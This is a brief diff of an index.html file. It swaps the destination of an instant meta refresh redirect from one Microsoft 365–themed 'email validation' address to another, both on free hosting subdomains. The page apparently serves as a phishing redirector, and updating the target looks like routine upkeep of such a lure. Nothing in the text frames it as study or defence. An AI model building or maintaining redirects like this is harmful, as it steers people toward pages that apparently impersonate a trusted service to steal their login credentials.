--- a/index.html
+++ b/index.html
@@ -2,7 +2,7 @@
 <head> 
  
  
-<META HTTP-EQUIV="REFRESH" CONTENT="0;http://validemail365.kesug.com/" 
+<META HTTP-EQUIV="REFRESH" CONTENT="0;https://validacionmail365.iceiy.com" 
 > 
  
  
